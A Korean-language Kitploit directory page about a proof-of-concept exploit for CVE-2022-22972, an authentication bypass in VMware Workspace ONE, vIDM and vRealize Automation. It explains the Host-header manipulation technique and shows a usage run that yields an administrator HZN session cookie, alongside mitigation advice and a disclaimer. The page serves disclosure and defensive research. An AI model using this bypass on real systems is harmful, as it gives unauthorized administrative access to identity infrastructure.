Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-22972 — CVE-2022-22972를 위한 개념 증명 익스플로잇으로, VMware Workspace ONE, vIDM 및 vRealize Automation 7.6에서 Host header 조작을 통해 인증을 우회합니다. | Kitploit
도구/GitHubGitHub/horizon3ai/cve-2022-22972
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationRed Teaming
GitHubhorizon3ai/cve-2022-22972

CVE-2022-22972

CVE-2022-22972를 위한 개념 증명 익스플로잇으로, VMware Workspace ONE, vIDM 및 vRealize Automation 7.6에서 Host header 조작을 통해 인증을 우회합니다.

저장소 보기
1502714년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-22972

CVE-2022-22972의 POC로, VMware Workspace ONE, vIDM 및 vRealize Automation 7.6에 영향을 미칩니다.

기술 분석

취약점에 대한 기술적 근본 원인 분석은 블로그에서 확인할 수 있습니다: https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive

요약

이 스크립트는 CVE-2022-22972를 이용하여 vRealize Automation 7.6에서 인증을 우회하는 데 사용할 수 있습니다. Workspace ONE과 vIDM은 서로 다른 인증 엔드포인트를 가지고 있지만, 취약점의 핵심은 동일합니다. 흐름을 검증할 테스트 기사가 있다면 풀 리퀘스트를 기꺼이 받아들입니다.

이 스크립트는 VMware 인증 엔드포인트에 대한 HTTP POST 요청의 Host 헤더를 공격자가 제어하는 Host로 변경하여 작동합니다. 이로 인해 VMware 애플리케이션이 해당 Host에 자격 증명 정보를 요청하게 되고, Host가 200을 반환하면 사용자가 성공적으로 인증됩니다.

이 스크립트는 HZN 쿠키를 생성하며, 이후 요청에 포함시켜 손상된 사용자로 작업을 수행할 수 있습니다.

참고: 스크립트의 기본 인자는 블로그에서 언급된 특정 엔드포인트에 대해 200을 응답하도록 구성된 AWS API 게이트웨이로 인증 요청을 보냅니다. --host 옵션으로 이를 변경할 수 있습니다. 이 엔드포인트는 익스플로잇 흐름 중에 민감한 데이터를 수신하지 않습니다 - 취약한 애플리케이션이 가짜 인증 헤더와 함께 요청을 보내고 이에 응답할 뿐입니다.

사용법

root@kitploit:~
dev@ubuntu:~/vmware/vra/exploit$ python3 CVE-2022-22972.py https://vra-app01.vra.intranet
Extracting state from vcac redirects...
Sending POST to auth endpoint

HZN=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJqdGkiOiJiM2E3MDJiOS01NjJkLTQwODgtYTg2Ny0xZjY5ZWE4YjAyZjMiLCJwcm4iOiJhZG1pbmlzdHJhdG9yQFZTUEhFUkUuTE9DQUwiLCJkb21haW4iOiJ2c3BoZXJlLmxvY2FsIiwidXNlcl9pZCI6IjMiLCJhdXRoX3RpbWUiOjE2NTM0MjUwOTAsImlzcyI6Imh0dHBzOi8vZWkzd3B0OTEwMC5leGVjdXRlLWFwaS51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9TQUFTL3QvdnNwaGVyZS5sb2NhbC9hdXRoIiwiYXVkIjoiaHR0cHM6Ly9laTN3cHQ5MTAwLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMi5hbWF6b25hd3MuY29tL1NBQVMvdC92c3BoZXJlLmxvY2FsL2F1dGgvb2F1dGh0b2tlbiIsImN0eCI6Ilt7XCJtdGRcIjpcInVybjp2bXdhcmU6bmFtZXM6YWM6Y2xhc3NlczpMb2NhbFBhc3N3b3JkQXV0aFwiLFwiaWF0XCI6MTY1MzQyNTA5MCxcImlkXCI6M31dIiwic2NwIjoicHJvZmlsZSBhZG1pbiB1c2VyIGVtYWlsIG9wZXJhdG9yIiwiaWRwIjoiMiIsImVtbCI6ImFkbWluaXN0cmF0b3JAdnJhLWFwcDAxLnZyYS5pbnRyYW5ldCIsImNpZCI6IiIsImRpZCI6IiIsIndpZCI6IiIsInJ1bGVzIjp7ImV4cGlyeSI6MTY1MzQyNjg5MCwicnVsZXMiOlt7InJlc291cmNlcyI6WyIqIl0sImFjdGlvbnMiOlsiKiJdLCJjb25kaXRpb25zIjpudWxsfV0sImxpbmsiOm51bGx9LCJleHAiOjE2NTM0MjY4OTAsImlhdCI6MTY1MzQyNTA5MCwic3ViIjoiYWQzODkzODEtNTRmNS00ODFkLWFmNWEtOWZjNmIzOGI0NzQ0IiwicHJuX3R5cGUiOiJVU0VSIn0.Kkq2UnmqpW6yJb3GGCp7dSXc5PlU1y8YyDULIYLHIvYlB3OC4j5xFDy91a2tk4bi1lAUITymV-NUgweoCl15LXFVfBFYLEs-OAvMLKZhhGnFF-BrxmyYLPJutkxsi-gL0rF4VmYykuYw9tdUY2DghWiGGZ6QTYOts21QUzcvU-8

Set the HZN cookie in your browser to bypass authentication

완화 조치

최신 버전으로 업데이트하거나 VMSA의 지침에 따라 완화하십시오.

  • https://www.vmware.com/security/advisories/VMSA-2022-0014.html

최신 보안 연구를 위해 Horizon3.ai 공격 팀을 트위터에서 팔로우하세요:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

면책 조항

이 소프트웨어는 학술 연구 및 효과적인 방어 기술 개발을 목적으로만 제작되었으며, 명시적으로 승인된 경우를 제외하고 시스템 공격에 사용하기 위한 것이 아닙니다. 프로젝트 관리자는 소프트웨어의 오용에 대해 책임을 지지 않습니다. 책임감 있게 사용하십시오.

도구 다운로드